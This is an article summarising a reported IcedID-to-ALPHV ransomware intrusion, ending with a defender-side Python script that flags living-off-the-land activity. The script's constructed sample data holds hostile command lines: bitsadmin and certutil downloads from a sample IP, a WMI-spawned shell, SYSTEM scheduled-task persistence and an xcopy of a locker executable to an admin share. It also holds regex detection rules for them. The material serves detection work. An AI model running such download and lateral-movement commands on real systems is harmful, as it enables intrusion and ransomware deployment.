A recently reported cyber attack involving ransomware showed how attackers hold victims’ data hostage until a ransom is paid. The method has proven lucrative for cybercriminals because it exploits how critical data is to individuals and organizations, who are often left with little choice but to pay in order to recover it.
The attack began with an email carrying a forked IcedID variant used for payload delivery. Once initial access was gained, the intruder installed ScreenConnect on the compromised computer for remote control, abused Cobalt Strike beacons, and deployed the CSharp Streamer RAT to obtain credentials and move laterally to domain controllers and servers.
Sensitive information was identified and collected with a custom tool known as ‘confucius_cpp,’ and rclone was used to exfiltrate it. Over the course of eight days, the attackers systematically deployed ScreenConnect installers across hosts using WMI and, after deleting backups, finally delivered the ALPHV ransomware payloads.
The intrusion that ended in ALPHV ransomware started with malicious spam emails that tricked victims into downloading and unzipping a zipped folder containing a Visual Basic Script (VBS). When the VBS ran, it executed an obfuscated IcedID loader DLL, which in turn dropped and executed a second IcedID DLL payload, completing the infection chain described in the DFIR Report.
The threat actor used ScreenConnect remote access tools delivered as disguised installers that were run through wmiexec and RDP sessions. Cobalt Strike beacons were retrieved using several techniques, including bitsadmin, certutil, and PowerShell. The CSharp Streamer RAT maintained persistence through scheduled tasks and was used for LSASS credential dumping, lateral movement, and C2 communications.
Process injection into key system processes such as winlogon.exe and rundll32.exe was observed during lateral movement, and the attacker removed the renamed installers afterwards. The attackers also dumped LSASS credentials and performed a DCSync against a domain controller from the initial entry point to harvest credentials.
Reconnaissance began with native Windows utilities launched through IcedID, followed by further reconnaissance commands issued through ScreenConnect. The attackers also ran network scans with SoftPerfect netscan on different days, targeting specific IP ranges and ports to identify potential vulnerabilities.
ScreenConnect installers were copied laterally via SMB and deployed with wmiexec.py for remote control. RDP was used extensively for lateral movement, and the attackers also used CSharp Streamer for proxying. Before exfiltration, the custom tool confucius_cpp enumerated systems, accessed shares based on keywords, and compressed the sensitive information.
Multiple tools were used during the intrusion: IcedID for initial access, Cobalt Strike beacons for communication, the CSharp Streamer RAT for C2 communications, and ScreenConnect remote access tools for control and reconnaissance. The attackers used Firefox to preview documents and to download rclone for data exfiltration.
The final payload was the ALPHV ransomware, which was staged on the backup server and, after the backups had been deleted, distributed across hosts via xcopy and executed through WMI. A ransom note referencing the group’s Twitter handle was left after encryption, marking the completion of the attack.
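As an added defender-side example (not code from the DFIR Report or from this article), the following Python script matches process-creation records against the living-off-the-land patterns described above: bitsadmin, certutil and PowerShell downloads, command shells spawned under WmiPrvSE.exe as wmiexec.py produces them, scheduled-task creation, and xcopy to administrative shares. All host names, paths, IP addresses and command lines are constructed sample data.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records: (host, parent_image, image, command_line).
SAMPLE_EVENTS = [
    ("WS01", r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer job /download /priority high http://203.0.113.5/b.dll C:\ProgramData\b.dll"),
    ("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     r"certutil -urlcache -split -f http://203.0.113.5/x.exe C:\ProgramData\x.exe"),
    ("SRV01", r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /Q /c C:\Windows\Temp\setup.exe 1> \\127.0.0.1\ADMIN$\__1699 2>&1"),
    ("SRV01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
     r"schtasks /create /tn Updater /tr C:\ProgramData\s.exe /sc onlogon /ru SYSTEM"),
    ("BKP01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\xcopy.exe",
     r"xcopy C:\stage\locker.exe \\SRV02\C$\Windows\Temp\ /Y"),
    ("WS02", r"C:\Windows\explorer.exe", r"C:\Program Files\Mozilla Firefox\firefox.exe",
     r"firefox.exe https://intranet.example"),  # benign: should produce no hit
]

# Each rule: (name, image regex, command-line regex, parent-image regex or None).
RULES = [
    ("lolbin_download_bitsadmin", r"bitsadmin\.exe$", r"/transfer|/addfile", None),
    ("lolbin_download_certutil", r"certutil\.exe$", r"-?urlcache|-?verifyctl", None),
    ("lolbin_download_powershell", r"powershell\.exe$",
     r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", None),
    # wmiexec.py runs "cmd.exe /Q /c ... 1> \\127.0.0.1\ADMIN$\__<ts> 2>&1" under WmiPrvSE.exe
    ("wmi_remote_exec", r"cmd\.exe$", r"ADMIN\$|/Q /c", r"wmiprvse\.exe$"),
    ("schtasks_persistence", r"schtasks\.exe$", r"/create", None),
    ("admin_share_copy", r"xcopy\.exe$", r"\\\\[^\\]+\\[a-z]\$", None),
]

def match_rules(event):
    """Return the names of all rules an event matches (case-insensitive)."""
    _host, parent, image, cmd = event
    hits = []
    for name, img_re, cmd_re, parent_re in RULES:
        if not re.search(img_re, image, re.I) or not re.search(cmd_re, cmd, re.I):
            continue
        if parent_re and not re.search(parent_re, parent, re.I):
            continue
        hits.append(name)
    return hits

def triage(events):
    """Group matched rule names per host so the cross-host chain is visible."""
    findings = defaultdict(list)
    for ev in events:
        for rule in match_rules(ev):
            findings[ev[0]].append(rule)
    return dict(findings)
```

Seeing download, WMI-spawned shell, scheduled task and admin-share copy hits land on different hosts within a short window is the signal to chase, since each pattern alone also has benign uses.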
In conclusion, the attack demonstrated the sophisticated tactics cybercriminals use to infiltrate systems, exfiltrate data, and deploy ransomware for financial gain. Organizations must remain vigilant and maintain robust security controls to protect against such activity.
